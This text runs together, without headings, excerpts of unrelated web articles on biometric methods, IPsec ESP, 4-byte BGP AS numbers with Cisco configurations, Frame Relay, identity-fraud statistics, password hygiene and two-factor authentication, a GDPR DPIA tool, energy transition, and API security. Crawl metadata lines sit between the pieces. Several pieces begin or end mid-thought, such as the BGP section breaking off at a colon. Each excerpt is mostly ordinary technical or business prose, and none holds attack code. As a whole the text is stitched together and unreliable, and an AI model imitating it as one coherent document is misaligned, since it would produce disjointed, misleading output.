Retinal scans capture capillaries deep within the eye by using unique near-infrared cameras. The raw image is first preprocessed to enhance the image then processed again as a biometric template to use during both enrollment and verification.
Facial recognition is, by far, the oldest form of biometric authentication. Even infants use facial recognition to identify the people closest to them. Biometric facial recognition software works much the same way, albeit with more precise measurements. Specifically, facial recognition software measures the geometry of the face, including the distance between the eyes and the distance from the chin to the forehead (just to name a few). After collecting the data, an advanced algorithm transforms it into an encrypted facial signature.
Unlike many other biometric modalities that require unique cameras to take measurements, ear shape biometrics measures the ear's acoustics using special headphones and inaudible sound waves. A microphone inside each earphone measures sound waves as they reflect from the ear canal, bouncing in different directions off the ear canal's distinct curves. A digital copy of the ear shape is then transformed into a biometric template for later use.
Voice recognition technology falls under both the physiological and behavioral biometric umbrellas. Physically speaking, the shape of a person’s vocal tract, including the nose, mouth, and larynx determines the sound produced. Behaviorally, the way a person says something – movement variations, tone, pace, accent, and so on – is also unique to each individual. Combining data from both physical and behavioral biometrics creates a precise vocal signature though mismatches due to illness or other factors can occur.
A thermogram is a representation of infrared energy in the form of a temperature distribution image. Biometric facial thermography captures heat patterns caused by moving blood beneath the skin. Because blood vessels are highly unique, corresponding thermograms are also unique – even among identical twins – making this method of biometric authentication even more accurate than traditional facial recognition software.
DNA has long been used for identification purposes. Additionally, it is the only form of biometrics that can trace familial ties. DNA matching is especially valuable when dealing with missing persons, disaster victim identification, and potential human trafficking. Furthermore, other than fingerprints, DNA is the only biometric that can be “left behind” unintentionally. DNA gathered from hair, saliva, semen, and so on contains Short Tandem Repeat sequences (STRs). DNA STRs can confirm identity by comparing them to other STRs in a database.
Different Types of Behavioral Biometrics
Behavioral biometrics are those that measure behavior patterns as opposed to (or in addition to) physical characteristics. These are just a few examples of behavioral biometrics.
Gait biometrics records stride patterns via video imaging, then transforms the mapped data into a mathematical equation. This type of biometric is unobtrusive, making it ideal for large-scale crowd surveillance, as it can quickly identify people from afar.
One of the newer forms of biometric authentication involves measuring lip movement. Much like a deaf person might track lip movement to determine what is said, biometric lip motion authentication tracks and records precise muscle movement around the lips to determine if they follow an expected pattern. Biometric lip motion sensors often require users to verbalize passwords and record the corresponding lip movement to grant or deny access.
Signature recognition is a behavioral biometric that measures spatial coordinates, pen pressure, inclination, and pen stroke in both “off-line” and “on-line” applications. A digital tablet records these measurements, then uses the information to automatically create a biometric profile for future authentication.
Keystroke dynamics take standard passwords to the next level by tracking the rhythm used to enter a password. Measurements might include the time it takes to press each key, delays between keys, characters typed per minute, and so on. Keystroke patterns work in conjunction with passwords and PINs to improve security efforts.
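A minimal sketch of the raw features involved: dwell time (how long each key is held) and flight time (the gap between releasing one key and pressing the next). The timestamps here are illustrative:

```python
def keystroke_features(events):
    """events: list of (key, press_time, release_time) tuples in milliseconds."""
    dwell = [release - press for _, press, release in events]
    flight = [events[i + 1][1] - events[i][2] for i in range(len(events) - 1)]
    return dwell, flight

# "pass" typed by a hypothetical user
sample = [("p", 0, 95), ("a", 160, 240), ("s", 310, 400), ("s", 455, 540)]
dwell, flight = keystroke_features(sample)
```

A profile built from many samples of these timings can then be compared against the rhythm observed alongside a password or PIN at login.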
Final Thoughts on the Different Types of Biometrics
Every individual is unique. Even identical twins differ in their behavior and physical make-up. Biometric technology differentiates unique characteristics to confirm identity and improve security.
Thanks to the many different types of biometrics, secure identity verification is becoming easier, quicker, and more accurate than ever. Contact iBeta to learn more about our biometrics testing and certification services.
Being one of the most popular tools used in network security, Encapsulating Security Payload (abbreviated as ESP) offers the help we need in keeping the integrity, authenticity and confidentiality of the information we send across networks. Keep reading to learn more!
With technological advancements, the way we conduct our business processes has changed immensely. Now, we rely heavily on internet technologies and transfer massive amounts of data daily. For this data traffic, we often employ wireless and wired networks. As a result, network security and the necessary cybersecurity measures gain importance each day.
In this article, we will take a closer look at what Encapsulating Security Payload is and how it works. Keep reading to learn more.
What is Encapsulating Security Payload?
Encapsulating Security Payload (abbr. ESP) is a protocol within the scope of IPsec.
Traffic on a network is carried in packets of data. In other words, when you want to send or receive data through a network, it is split into packets of information so that it can travel within the network. The payload is the part of a packet that contains the ‘actual’ information, the intended message.
The Encapsulating Security Payload aims to offer the necessary security measures for these packets of data and/or payloads. With the help of Encapsulating Security Payload, confidentiality, integrity and authentication of payloads and data packets can be ensured in both IPv4 and IPv6 networks.
How does the Encapsulating Security Payload work?
Operating directly on top of the IP layer, the Encapsulating Security Payload is able to function with both the IPv6 and IPv4 protocols. The way ESP operates is pretty straightforward: it is inserted between the Internet Protocol/IP header and upper-layer protocols such as UDP, ICMP or TCP. In this position, the ESP takes the form of a header.
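The fields that lead an ESP packet are fixed: a 4-byte Security Parameters Index (SPI) and a 4-byte sequence number, followed by the (normally encrypted) payload and a trailer. The sketch below packs just the leading fields; encryption, padding and the integrity check value are omitted:

```python
import struct

def esp_leading_fields(spi: int, seq: int, payload: bytes) -> bytes:
    """Prepend the ESP SPI and sequence number (both 32-bit, network byte order)
    to a payload. Real ESP also appends padding, a pad-length byte, a next-header
    byte and an integrity check value, and encrypts the payload plus trailer."""
    return struct.pack("!II", spi, seq) + payload

packet = esp_leading_fields(spi=0x1234ABCD, seq=1, payload=b"hello")
```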
How can the Encapsulating Security Payload be used?
Although the Encapsulating Security Payload offers many benefits, it can be applied in only two ways: Tunnel mode and transport mode.
In the tunnel mode, a new IP header is created and used as the outermost IP header. It is followed by the Encapsulating Security Payload Header and original datagram. Tunnel mode is a must for the gateways.
In transport mode, the IP header is neither authenticated nor encrypted. As a result, your addressing information can potentially be exposed during the datagram's transit. Transport mode often requires less processing, which is why most hosts prefer to use Encapsulating Security Payload in transport mode.
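Conceptually, the two modes differ only in where the ESP header sits and whether a new IP header is added. The schematic below is a conceptual view, not a byte-accurate layout:

```python
# Header ordering in the two ESP modes (schematic)
transport_mode = ["original IP header", "ESP header", "TCP/UDP segment",
                  "ESP trailer + ICV"]
tunnel_mode = ["new IP header", "ESP header", "original IP header",
               "TCP/UDP segment", "ESP trailer + ICV"]

# In tunnel mode the entire original datagram (header included) is protected;
# in transport mode the original IP header stays outside ESP's protection.
```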
What are the benefits of the Encapsulating Security Payload?
The Encapsulating Security Payload offers all the functions of the Authentication Header, which are anti-replay protection, authentication and data integrity. On the other hand, the ESP differs from the Authentication Header in terms of data confidentiality: the ESP can provide data confidentiality while the Authentication Header cannot.
Moreover, the Encapsulating Security Payload aims to provide various services, including but not limited to:

- Confidentiality for the transferred data (through encryption)
- Data origin authentication
- Connectionless data integrity
- Anti-replay protection
- Limited traffic flow confidentiality
Before January 2009, we only had 2-byte AS numbers in the range of 1-65535. 1023 of those (64512-65534) are reserved for private AS numbers.
Similar to IPv4, we started running out of AS numbers, so IANA expanded the AS number space by introducing 4-byte AS numbers in the range of 65536 to 4294967295.
There are three ways to write down these new 4-byte AS numbers:
Asplain is the simplest to understand; these are just regular decimal numbers. For example, AS numbers 545435, 4294937295, 4254967294, 2294967295, etc. These numbers are simple to understand but prone to errors. It's easy to make a configuration mistake or misread a number in the BGP table.
Asdot represents AS numbers below 65536 using the asplain notation and AS numbers of 65536 and above with the asdot+ notation.
Asdot+ breaks the AS number into two 16-bit parts, a high-order value and a low-order value, separated by a dot. All older AS numbers fit in the second part, with the first part set to 0. For example:
- AS 6541 becomes 0.6541
- AS 54233 becomes 0.54233
- AS 544 becomes 0.544
For AS numbers above 65535, we use the next high order bit value and start counting again at 0. For example:
- AS 65536 becomes 1.0
- AS 65537 becomes 1.1
- AS 65538 becomes 1.2
These numbers are easier to read but harder to calculate than the asplain numbers, and it’s also a bit trickier to create regular expressions for them.
If you want to convert an asplain AS number to an asdot+ AS number, you take the asplain number and see how many times you can divide it by 65536. This is the integer that we use for the high order bit value.
Then, you take the asplain number and deduct (65536 * the integer) to get your low order bit value. In other words, this is the formula:
integer (high order bit value) = asplain / 65536
remainder (low order bit value) = asplain - (integer * 65536)
asdot value = integer.remainder
Here are two examples:
#AS 5434995
5434995 / 65536 = 82
5434995 - (82 * 65536) = 61043
asdot = 82.61043

#AS 1499547
1499547 / 65536 = 22
1499547 - (22 * 65536) = 57755
asdot = 22.57755
Once you understand how the conversion is done, you can use the APNIC asplain to asdot calculator to convert this automatically and make your life a bit easier.
BGP speakers that support 4-byte AS numbers advertise this via BGP capability negotiation and there is backward compatibility. When a “new” router talks to an “old” router (one that only supports 2-byte AS numbers), it can use a reserved AS number (23456) called AS_TRANS instead of its 4-byte AS number. I’ll show you how this works in the configuration.
Cisco routers support the asplain and asdot representations. The configuration is pretty straightforward and I’ll show you two scenarios:
- Two routers that both have 4-byte AS support.
- Two routers where one router only has 2-byte AS support.
4-byte AS support
We have two routers:
Both routers support 4-byte AS numbers. You can see this when you configure the AS number:
R1(config)#router bgp ?
  <1-4294967295>  Autonomous system number
  <1.0-XX.YY>     Autonomous system number
As you can see, this IOS router supports asplain and asdot numbers. Let’s pick asplain and establish a BGP neighbor adjacency:
R1(config)#router bgp 12000012
R1(config-router)#neighbor 192.168.12.2 remote-as 12000012

R2(config)#router bgp 12000012
R2(config-router)#neighbor 192.168.12.1 remote-as 12000012
You can see the asplain AS numbers in all bgp show commands:
R1#show ip bgp summary
BGP router identifier 192.168.12.1, local AS number 12000012
BGP table version is 1, main routing table version 1

Neighbor        V        AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.12.2    4  12000012       5       5        1    0    0 00:01:02        0
If you want, you can change the representation to the asdot format:
R1(config-router)#bgp asnotation ?
  dot  asdot notation
Let’s change it:
R1(config-router)#bgp asnotation dot
You will now see the asdot format in all show commands:
R1#show ip bgp summary
BGP router identifier 192.168.12.1, local AS number 183.6924
BGP table version is 1, main routing table version 1

Neighbor        V        AS MsgRcvd MsgSent   TblVer  InQ OutQ Up/Down  State/PfxRcd
192.168.12.2    4  183.6924       6       6        1    0    0 00:02:38        0
AS 12000012 now shows up as AS 183.6924.
Want to take a look for yourself? Here you will find the startup configuration of each device.
hostname R1
!
ip cef
!
interface GigabitEthernet0/1
 ip address 192.168.12.1 255.255.255.0
!
router bgp 183.6924
 bgp asnotation dot
 neighbor 192.168.12.2 remote-as 183.6924
!
end

hostname R2
!
ip cef
!
interface GigabitEthernet0/1
 ip address 192.168.12.2 255.255.255.0
!
router bgp 12000012
 neighbor 192.168.12.1 remote-as 12000012
!
end
2-byte AS support
Let’s use two routers. R1 only supports 2-byte AS numbers, R2 supports 4-byte AS numbers:
R1 has no clue what an AS number above 65535 is: | <urn:uuid:be50d2de-a3e3-444a-a1e1-c2e92106f885> | CC-MAIN-2022-40 | https://networklessons.com/bgp/bgp-4-byte-number | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00688.warc.gz | en | 0.741901 | 1,429 | 2.890625 | 3 |
The topics and questions that this chapter addresses include the following:
Enabling Frame Relay encapsulation
Configuring LMI type on a Frame Relay interface
Configuring static and dynamic DLCI to network layer address mapping
Configuring Frame Relay subinterfaces
Configuring point-to-point subinterfaces
Configuring multipoint subinterfaces
Configuring a Cisco router as a Frame Relay switch
Configuring Frame Relay switching using a local significance approach to DLCI assignment
Configuring Frame Relay switching using a global significance approach to DLCI assignment
Verifying Frame Relay connections with Cisco IOS show commands
Troubleshooting Frame Relay connections with IOS debug commands
After completing this chapter, readers will be able to use the basic Frame Relay configuration commands in the Cisco IOS software. Readers will be able to configure a basic Frame Relay network involving Cisco equipment and to perform basic monitoring and troubleshooting using the relevant Cisco IOS show and debug commands.
Configuring Frame Relay
Frame Relay is configured on the Cisco router via the text-based Cisco IOS Command Line Interface (CLI). This section looks at the configuration commands required to configure basic Frame Relay operation on a Cisco router.
A basic setup involving the hardware configurations depicted in Figure 4-1 is used for this discussion and for illustration purposes. Later in this chapter, additional hardware will be required to explain more complex configuration tasks. In the setup used in this chapter, the Cisco routers are configured as Frame Relay access devices, or data terminal equipment (DTE), connected directly to a dedicated Frame Relay switch, or data circuit-terminating equipment (DCE). Note that Cisco routers can also be configured to operate as a Frame Relay switch. The configuration tasks will be fully explained in a later section.
Figure 4-1 Frame Relay Hardware Configuration
Different Cisco IOS software versions or releases may display slightly different output. For consistency, Cisco IOS Software Release 12.2(1) is loaded on all routers used in the configuration examples in this chapter.
Example 4-1 displays the show output of the show version command on R1.
Example 4-1 IOS Version Loaded on the Lab Routers
R1#show version
Cisco Internetwork Operating System Software
IOS (tm) 7200 Software (C7200-JS-M), Version 12.2(1), RELEASE SOFTWARE (fc2)
Copyright (c) 1986-2001 by cisco Systems, Inc.
Compiled Thu 26-Apr-01 22:10 by cmong
Image text-base: 0x60008960, data-base: 0x616B0000
Identity fraud increased substantially in 2008, reversing a four-year trend of decreasing incidents. Researchers say identity fraud increased by 22 percent last year and they anticipate another 22 percent jump in 2009, attributing the increases to crimes of opportunity driven by the economic downturn1.
What’s more, despite recent headlines and growing fears about online security and data breaches, old-fashioned theft is the most popular way thieves steal identities and perpetrate identity fraud.
According to 2008 claim data compiled by Travelers, burglary and theft of wallets, purses and personal computers provide thieves the best opportunity to gain access to personal information. In instances where the victim knew their identity had been stolen, it was the result of personal property being stolen nearly 78 percent of the time.
Travelers identifies the following as the top known causes of identity fraud:
- 78% – burglary and theft of wallet/purse/personal identification/computer
- 14% – online or data breach
- 5% – change of address/postal fraud
- 3% – lost credit card and other miscellaneous causes.
What do thieves do with the information once they have it? More than 75 percent of the time, they use the information to open new credit card accounts or use the existing credit cards to make charges. Twenty percent of identity thieves will withdraw money from existing checking, savings and online accounts and 16 percent open utility accounts in the victim’s name. | <urn:uuid:41757296-752c-464b-8a09-6610b6449dc0> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2009/11/02/top-causes-of-identity-fraud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00688.warc.gz | en | 0.919426 | 292 | 2.875 | 3 |
Passwords are a terrible way to secure things. If you have a WordPress website, the only thing that protects your account is a username and password. Email accounts are even more vulnerable, as they are only protected by a password. Anyone can try to log in to your accounts, and we are seeing scripts that try to brute-force accounts all the time.
In addition, it is probably fair to say that most people are pretty bad at managing passwords. We like to be able to remember our passwords, but the only way to do so is by (re)using weak passwords, such as Rebecca1984 or Darling123. Passwords like that are easily compromised. In fact, there are various websites such as Kaspersky’s password checker that estimate how long it takes for someone to crack a password (Rebecca1984 takes three minutes and Darling123 takes 20 minutes).
This article covers basic steps you can take to secure your accounts. It won’t protect your accounts against, say, state-sponsored hackers. If the likes of GCHQ are after you then it is pretty much game over. Most attacks, though, are fairly basic. Attackers typically run scripts that try to log in to an account. They often try lots of weak passwords in a very short period of time. In other words, most attackers are after people who use weak passwords, or the “low hanging fruit”. The aim of this guide is to make sure you are not low hanging fruit.
The more complicated a password, the more secure your account is. Using names such as “Rebecca” or “Darling” in your password is a bad idea, as attackers typically try variations of common words: rebecca, Rebecca, rebecca1, Rebecca1 etc. Scripts can fire thousands of passwords at a login page, so it really doesn’t take that long before they have tried Rebecca1984. A password such as, say, lf8@NGRkx>c;DYt~iK is obviously going to be a lot harder to guess!
When you create a password in cPanel you have the option to generate a random password. We recommend creating a password that is at least 12 characters long and contains letters, numbers and symbols.
Image: cPanel’s password generator.
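If you prefer to script password generation outside cPanel, the same idea takes only a few lines (a sketch using Python's secrets module; the 18-character length and symbol set are arbitrary choices that satisfy the recommendation above):

```python
import secrets
import string

def generate_password(length: int = 18) -> str:
    """Generate a random password containing letters, digits and symbols."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*()-_=+<>?"
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        # Keep only candidates with at least one of each character class.
        if (any(c.islower() for c in pw)
                and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)
                and any(not c.isalnum() for c in pw)):
            return pw

print(generate_password())
```

The secrets module is designed for security-sensitive randomness, unlike the random module, which should never be used for passwords.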
Unless you have an incredible memory you can’t remember every random password you create. To securely store your passwords you can use a password manager. There are lots of password managers, both free and paid-for. We like Bitwarden. It is free, open source and has been audited by independent security researchers. You can run Bitwarden as a desktop application or integrate it into your browser, and you can even host Bitwarden yourself.
Whichever password manager you choose, almost all work on the same principle. You need to create a master password, which you use to unlock the password manager. You can then access all your passwords (and any other data you want to store securely, such as your National Insurance number). Obviously, you do need to pick a master password that is complicated but which you can remember. You might want to use a pass-phrase, such as “My horses like eating straw!” (which, according to the above-mentioned Kaspersky password checker, takes 10000+ centuries to crack).
Multi-factor authentication (better known as two-factor authentication or 2FA) adds an extra layer of security to your accounts. A password, however strong, is just one factor of authentication. There are still various ways via which an attacker can get a password. Someone could get access to your password manager, or perhaps a website where you enter your password is running malicious code that looks for login credentials. Your operating system might have been compromised and have a keystroke logger installed.
The solution is to add a another factor of authentication. Your password is something you know, and is factor one. The second factor is typically something you have. That thing can be a so-called OTP code that is generated by an app on your smartphone.
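Under the hood, those app-generated codes are usually TOTP values as defined in RFC 6238: an HMAC of the current 30-second time window, keyed with a secret shared between your app and the server. A minimal sketch (simplified for illustration; real implementations also handle clock drift by accepting adjacent windows):

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, interval=30, digits=6):
    """Minimal TOTP (RFC 6238), the algorithm authenticator apps use."""
    if for_time is None:
        for_time = time.time()
    key = base64.b32decode(secret_b32.upper())
    counter = int(for_time) // interval                # 30-second window number
    msg = struct.pack(">Q", counter)                   # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                         # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # a new 6-digit code every 30 seconds
```

Because both sides derive the code from the shared secret and the current time, an attacker who steals only your password still cannot log in.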
Multi-factor authentication is available for both your hosting control panel (i.e. cPanel or Plesk) and your billing control panel. There are also various WordPress plugins that enable 2FA for your website. This is particularly useful. WordPress is widely used and therefore a popular target for attackers.
In your WordPress dashboard, select Plugins » Add New and search for “2FA” or “two factor authentication”. There are plenty of 2FA plugins and we can’t make recommendations. Take some time to read the descriptions of plugins that look suitable, and pay attention to both reviews from other users and how actively maintained the plugin is. You don’t want to install a plugin that has bad reviews and hasn’t been updated for over a year!
For this article we are going to install a plugin named Two-Factor. The plugin is free, has been actively maintained for years and users seem to like the plugin. It also has some useful features, such as backup codes (which you can use if you ever lose access to your 2FA app).
Image: Installing a WordPress 2FA plugin.
To install the plugin, simply click the Install Now button. This should take a few seconds, after which the button turns into an Activate button. You can now enable 2FA for individual users via the Users menu.
The plugin can send you an email with an OTP code or you can use an app such as Google Authenticator (the latter option is recommended). Next, you can either scan the QR code shown on the page or manually enter the code that appears below the image in your preferred 2FA app. The app will then start generating OTP codes. To complete the set-up you just need to enter an OTP code in the Authentication Code field.
If you lose your phone you also lose access to your 2FA codes. To avoid being locked out of your own account, you can use backup verification codes. These are codes you can enter at any time to get access – you can think of them as OTP codes that never change. If you store the backup codes somewhere safe (such as a password manager), then you are always able to log in, even if you no longer have access to your 2FA app.
Not all 2FA plugins let you create backup codes, so that is one thing to check when deciding which plugin to use. In the case of the Two-Factor plugin you can get backup codes by clicking the Generate Verification Codes button in the plugin’s settings menu.
Image: generating backup codes.
Clicking the button gives you ten backup codes. Store them somewhere safe!
You don’t have to use a multi-factor authentication app on your phone. There are various desktop applications and browser plugins you use instead. For instance, in the below screenshot I use a browser plugin called Authenticator. The plugin is freely available for Chrome, Firefox, and Microsoft Edge.
Image: the Authenticator browser plugin.
So far we have only talked about things you can do to secure your accounts. You might wonder what we do to secure your accounts. There are lots of things we do, and we obtained an ISO 27001 Information Security certificate to prove it.
All our servers monitor traffic for suspicious behaviour, including failed email and WordPress logins. When there are a number of failed logins in a short period of time, the IP address from which the logins come is blocked. That does mean we occasionally block someone who simply entered their login details incorrectly a few times, but it stops a very large number of attacks.
We are fairly strict when it comes to reducing attack vectors as well. For instance, we don’t allow SSH and remote database access on our shared hosting plans, and for other packages we put everything behind a VPN. Of course, we also look after our infrastructure. Our servers are patched regularly and we use multi-factor authentication everywhere.
And of course we make sure that multi-factor authentication can be used for all our hosting control panels as well as our billing control panel. We hope that you will make use of it! | <urn:uuid:c6abde9d-2764-4cc2-a730-4882787c968a> | CC-MAIN-2022-40 | https://www.catalyst2.com/knowledgebase/getting-started/password-hygiene-and-multi-factor-authentication/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00088.warc.gz | en | 0.93681 | 1,704 | 2.921875 | 3 |
What is a DPIA?
A DPIA (data protection impact assessment) is, effectively, a type of risk assessment. A core part of a DPIA is identifying risks and working out how likely they are to occur and the impact they would have. More specifically, a DPIA is an assessment of how a particular process will impact the protection of personal data, and its checklist of requirements differs from that of a typical information security risk assessment.
“A DPIA is a process designed to describe the processing, assess its necessity and proportionality and help manage the risks to the rights and freedoms of natural persons resulting from the processing of personal data by assessing them and determining the measures to address them.” – WP29 (Article 29 Working Party)
DPIAs are important tools for accountability. Described in Article 35 of the GDPR (General Data Protection Regulation), they are just one of the requirements that organizations need to comply with in order to protect the personal data they process. DPIAs help controllers not only comply with the requirements of the Regulation but also demonstrate that appropriate measures have been taken to ensure that compliance.
DPIAs are sometimes referred to as PIAs (privacy impact assessments). The terms are effectively interchangeable, but the GDPR refers exclusively to DPIAs, so that’s the term we use.
Why use the DPIA Tool?
Organizations that need to be GDPR compliant also need to undertake a DPIA, or at least answer the qualifying questions to find out if one is required.
When is a DPIA required?
A DPIA is required if a process is likely to result in a high risk to the rights and freedoms of data subjects (see below). This comprises:
- Using automation to make decisions that could significantly affect an individual;
- Processing sensitive data (health data, political views, sexuality, etc.) on a large scale; and
- Monitoring public areas on a large scale.
What is a data subject?
A data subject is any natural person (i.e. a living individual) whose personal data is processed by the organization. Data subjects might be employees, contractors, etc., as well as customers. Examples include advisers, agents, applicants, complainants, consultants, contractors, correspondents, enquirers, members, patients, representatives, researchers, students, suppliers, temporary workers and volunteers.
What constitutes a high-risk process?
A high-risk process is anything that meets the criteria outlined in Article 35 of the GDPR and guidance provided by the ICO and the WP29 (now replaced by the European Data Protection Board, which has endorsed the WP29’s DPIA guidelines). Identifying high-risk processes can be difficult, but any process that meets the criteria in the GDPR or guidance given by the ICO and the WP29 should definitely be considered high risk.
Who should conduct a DPIA?
- The controller is responsible for conducting DPIAs where they are required (as per Article 35).
- The processor is obliged to assist the controller with its DPIAs (as per Article 28,3(f)).
What is the DPIA Tool?
Our tool walks customers through the six steps they must complete as part of a DPIA.
- Step 1 – Process description: Contains a questionnaire that prompts users for information about the process in question.
- Step 2 – Screening questions: Contains screening questions that help users work out if they need to conduct a DPIA.
- Step 3 – Consultation: Contains a questionnaire that prompts users for information about the parties they’ve consulted (such as data subjects or their representatives).
- Step 4 – Principles questionnaire: Contains a questionnaire prompting users to provide information about the necessity and proportionality of processing — e.g. what measures they have in place to uphold data protection principles, data subject rights, etc.
- Step 5 – Privacy risk assessment: Gives users the means to identify individual risks to the rights and freedoms of data subjects, including evaluating levels of risks and determining risk responses.
- Step 6 – Review: Contains a brief questionnaire asking users about whether the DPIA has been reviewed and whether the process is authorized to go ahead.
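The Step 2 screening logic lends itself to automation. The sketch below is an illustrative toy, not part of the actual DPIA Tool, and the question keys are invented; it encodes the rule that a single "yes" to any Article 35(3) qualifying question means a DPIA should be conducted:

```python
# Hypothetical screening checklist based on the high-risk criteria above.
SCREENING_QUESTIONS = {
    "automated_decisions":
        "Does the process use automation to make decisions that could "
        "significantly affect an individual?",
    "special_category_large_scale":
        "Does it process sensitive data (health data, political views, "
        "sexuality, etc.) on a large scale?",
    "public_monitoring":
        "Does it monitor public areas on a large scale?",
}

def dpia_required(answers: dict) -> bool:
    # A single 'yes' means the processing is likely high risk,
    # so a DPIA must be conducted.
    return any(answers.get(q, False) for q in SCREENING_QUESTIONS)

answers = {"automated_decisions": False,
           "special_category_large_scale": True,
           "public_monitoring": False}
print(dpia_required(answers))  # True: a DPIA is required
```

Unanswered questions default to "no" here; a real screening process would instead force an explicit answer to every question.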
The tool is didactic, meaning that you don’t have to be an expert to complete a DPIA. The tool will make sure that you answer all the right questions. Wherever possible, references are included in the relevant sections of the GDPR, so it’s straightforward to check why a question is being asked and its context.
The DPIA Tool is aligned with guidance from both the ICO and the WP29, ‘guaranteeing comprehensive DPIAs’.
For further information on how our DPIA Tool can help your organization stay GDPR compliant, speak to our experts. If you’d like to see the tool in action, book a one-to-one demonstration today.
The world we live in is undergoing rapid change, from industrialization to urbanization to digitalization. Over the coming decades, the pressure on our environment will only intensify as the climate crisis remains under the global spotlight.
With global energy demand increasing, the energy landscape is evolving at pace and becoming more complex, so it’s critical that we stay focused on the end goal in our energy transition – the need for decarbonization.
Overview of energy transition
The energy transition is on everyone’s mind today; you hear about it everywhere you go – at conferences, in the news, even at your local pub. It is everyone’s vision, but it cannot happen without more innovation, new technologies and heaps of ambition.
The scale and rapidity of the transition away from fossil fuels are unprecedented. Put simply, it is the largest in our history. It cannot even be compared to previous energy transitions. It took coal 125 years to overtake traditional biomass as the primary source of energy, a shift epitomised by Watt’s steam engine of 1776. It took a further 100 years for oil to overtake coal as the primary source, and gas is currently expected to take the lead by 2030.
Yet to rapidly mitigate climate change effects, the world agrees that renewables need to become the primary source of energy no later than 2050. That is only 20 years after the previous transition. At the same time, the demand for energy continues to grow globally. Total global energy consumption today is approximately 150,000 TWh per year, and the vast majority is delivered from fossil fuels. Alongside this, the EIA (US Energy Information Administration) predicts an almost 50% increase in world energy usage by 2050 (compared with 2019), led by growth in Asia.
To support this growing demand for energy and balance it with the need to reduce carbon emissions, the global fuel mix over the next 20 years must become far more diversified than before. According to BP’s Energy Outlook, to achieve net zero by 2050 the total final energy mix (excluding non-combusted energy) should consist of up to 85% electricity, hydrogen and bioenergy, with carbon capture and storage playing a significant role.
In May this year, the International Energy Agency released its roadmap to net zero for the global energy sector, which outlined a two-pronged strategy: a decade of massive clean energy expansion using existing technology (the 2020s), followed by the integration of technologies (2030-2050) that are currently only at the demonstration or prototype phase.
What is clear, as we enter a multi decade transition, is that technology will be the key enabler to the diversification and hybridization of fuels.
So, how do we drive the energy transition forward?
The energy transition is becoming much more tangible, but it will take time, and there are countless paths to get to net zero that will affect the future energy system.
The journey is as important as the destination. We are not going to get there overnight, and we all have a part to play. Industry needs to work together in a concerted and collective way.
Ultimately, supply must match demand, and this presents some challenges. Electricity and hydrogen will have an important role in the new energy mix, but the cost of this energy versus conventional fuels needs to be considered. Capital costs are high, so for many it is simply not affordable to diversify quickly, and long investment cycles must be factored in. Similarly, renewables, which in many parts of the world are established sources of energy, remain intermittent and challenging to store. Socio-economic and political challenges must also be considered, with local circumstances, available energy sources and existing infrastructure differing greatly across markets and economies around the globe.
Therefore, as well as diversification, hybridization needs to occur. Fossil fuels will not disappear overnight, so it is important to ensure their production is as energy efficient and carbon neutral as possible. This can be achieved by integrating renewables and electrification into their production models. Likewise, the cleanest energy is the energy we save and enabling low carbon, efficient operations for existing operators is also vital. It’s time to reappraise the value of energy and ensure that energy efficiency and smart energy management is top priority. Every unit of energy, no matter how small, makes a difference.
Automation and digitalization can help reconcile all these industrial needs to ensure access to affordable, reliable and sustainable energy.
We are working closely with customers to deploy technologies that will help accelerate their energy transition, via electrification, the integration and growth of renewables, and by ensuring energy efficiency. This includes; delivering solutions for floating wind farms to power offshore oil and gas platforms, ensuring the reliability and stability of hydro and solar power, helping to reduce CO2 emissions in the steel industry by replacing coal with hydrogen in the steelmaking process, and working with electrolyzer manufacturers to optimize the production of green hydrogen.
There is no doubt that the energy transition is already forcing significant structural change to the energy landscape, but this is necessary and welcome change which ultimately will enable a clean energy future.
Today it is much more than the transition from fossil fuels to renewable energy – there are so many more dimensions – and we should not underestimate the advances that have already been made around the world. But if we are to sustain and accelerate these efforts, we need to continually invest and innovate, working together to ensure more sustainable, resilient, affordable, and secure energy for all.
By Brandon Spencer, President Energy Industries, ABB
Brandon Spencer is currently serving as President for ABB’s Energy Industries division globally. In this capacity he is a member of the Industrial Automation Business Area management team. The Energy Industries division helps companies across the energy industry develop, produce and operate safely, efficiently and profitably. Brandon joined ABB in 2006 and has dedicated his career to helping ABB’s customers achieve their goals and be more successful.
His responsibilities during his 15 years with the company include Global Account Management for both ConocoPhillips and ExxonMobil, Vice President of ABB’s Oil, Gas and Chemicals business in North America, as well as managing several of ABB’s large national accounts. Most recently (2018-2020), Brandon served as Managing Director for the Process Industries business line, covering Mining, Pulp & Paper, Metals, Aluminum, Cement, and Hybrid Industries.
Prior to joining ABB, Brandon served in various roles within Siemens Power Generation. These roles included positions in operations, service, and sales & marketing. Brandon holds a bachelor’s degree in economics and a master’s degree in business administration from the Crummer School of Business at Rollins College in Winter Park, FL. He is based in Houston, Texas. | <urn:uuid:24f210f5-65ec-49e1-a206-be508b73a685> | CC-MAIN-2022-40 | https://www.dailyhostnews.com/the-critical-role-of-energy-transition-in-reducing-the-worlds-carbon-footprint | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00088.warc.gz | en | 0.949155 | 1,377 | 3.234375 | 3 |
APIs are the hottest attack vector in modern software. In this blog, we’ll look at how APIs add risk and best practices for securing them.
For anyone who doesn’t know, API stands for Application Programming Interface. APIs provide a way for software programs to communicate with the external world. And securing these interfaces is a growing problem.
Historically, security teams have focused on securing the platform (networks and infrastructure) on which applications run. Today, teams use CWPP and CSPM solutions to help secure their cloud environments and workloads. And while these security tools are essential, they’re only one piece of the puzzle.
